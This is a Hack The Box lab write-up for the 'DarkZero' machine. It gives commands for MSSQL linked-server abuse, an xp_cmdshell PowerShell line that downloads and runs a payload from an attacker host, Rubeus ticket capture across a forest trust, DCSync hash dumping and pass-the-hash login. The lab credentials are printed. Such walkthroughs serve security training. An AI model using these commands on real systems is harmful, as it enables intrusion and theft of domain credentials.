DarkZero – Hack The Box Writeup
As is common in real-world pentests, the DarkZero box provides initial credentials:
Username: john.w
Password: RFulUtONCOL!
sudo nmap -p- -sV --min-rate 1000 10.10.11.89PORT STATE SERVICE53/tcp open domain88/tcp open kerberos-sec135/tcp open msrpc139/tcp open netbios-ssn389/tcp open ldap445/tcp open microsoft-ds464/tcp open kpasswd5593/tcp open http-rpc-epmap636/tcp open ldapssl1433/tcp open ms-sql-s2179/tcp open vmrdp3268/tcp open globalcatLDAP3269/tcp open globalcatLDAPssl5985/tcp open wsman9389/tcp open adws
Nmap done: 1 IP address (1 host up) scanned in 0.91 secondsThese credentials are valid for MSSQL, LDAP, and SMB.
MSSQL Access & Linked Server Abuse
impacket-mssqlclient darkzero.htb/john.w:RFulUtONCOL\!@10.10.11.89 -windows-auth
enum_links
use_link "DC02.darkzero.ext"
Enable xp_cmdshell on the linked server:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
Reverse Shell via xp_cmdshell
Configure payload in msfconsole:
Run exploit:
Copy payload to .bat file:
Execute on target:
EXEC xp_cmdshell 'powershell -Command "Invoke-WebRequest -Uri http://$ip/payload.bat -OutFile C:\Windows\Temp\payload.bat; C:\Windows\Temp\payload.bat"'
File downloaded & executed → shell obtained:
Meterpreter session:
use session 3
Local exploit suggester:
run post/multi/recon/local_exploit_suggester
Set options & run:
Hashdump (for reference):
Discovering Dangerous Forest Trust Delegation
Using PowerView:
╭─LDAPS─[DC01.darkzero.htb]─[darkzero-ext\Administrator]-[NS:<auto>] [CACHED]╰─PV ❯ Get-NetTrust...trustAttributes : FOREST_TRANSITIVE**CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION**...WARNING
TheCROSS_ORGANIZATION_ENABLE_TGT_DELEGATIONflag allows unconstrained delegation across forest trust boundaries — a very dangerous misconfiguration!
This enables us to coerce authentication from DC01 and capture its machine ticket on DC02.
Rubeus.exe – Kerberos Swiss Army Knife
Rubeus is a powerful post-exploitation tool for raw Kerberos interaction and abuse in Active Directory.
It is very commonly used by real attackers, so its presence outside labs/red-team engagements is a major red flag.
Official project: GhostPack/Rubeus
(Precompiled binary used: r3motecontrol/Ghostpack-CompiledBinaries)
Written in C# — runs entirely in user space
Purpose: Interact directly with Kerberos tickets, LSA memory, and Domain Controllers.
Key capabilities used in this attack:
- Ticket monitoring (
monitor): Watches for new TGTs at set intervals - Ticket harvesting (
harvest,triage,dump): Extracts usable tickets - Pass-the-Ticket (
ptt): Injects stolen tickets into sessions - Delegation abuse (
s4u, unconstrained delegation exploits)
OpSec note: Many actions (especially rc4_hmac usage) are detectable via EDR, DC logs (encryption downgrade), or abnormal port 88 traffic from non-lsass.exe processes.
Uploading Rubeus.exe to our session on DC02:
upload /home/alphabeta/Downloads/Rubeus.exe
Start monitoring for incoming TGTs:
Rubeus.exe monitor /interval:5 /nowrap
Trigger authentication from DC01 (via linked server MSSQL):
xp_dirtree \\DC02.darkzero.ext\sfsdafas
DC01$ machine TGT captured!
Save ticket:
Convert base64 → .kirbi:
Convert .kirbi → .ccache (for impacket):
Set environment:
DCSync with Stolen DC Machine Ticket
impacket-secretsdump -k -no-pass darkzero.htb/DC01\$@DC01.darkzero.htb
TIP
Full domain hash dump achieved — including krbtgt — allowing golden tickets or PTH everywhere!
Final Access & Flags
Use evil-winrm (or PTH/golden ticket):
evil-winrm -i 10.10.11.89 -u Administrator -H <NTLM hash>
Submit user.txt & root.txt obtained. Machine pwned!
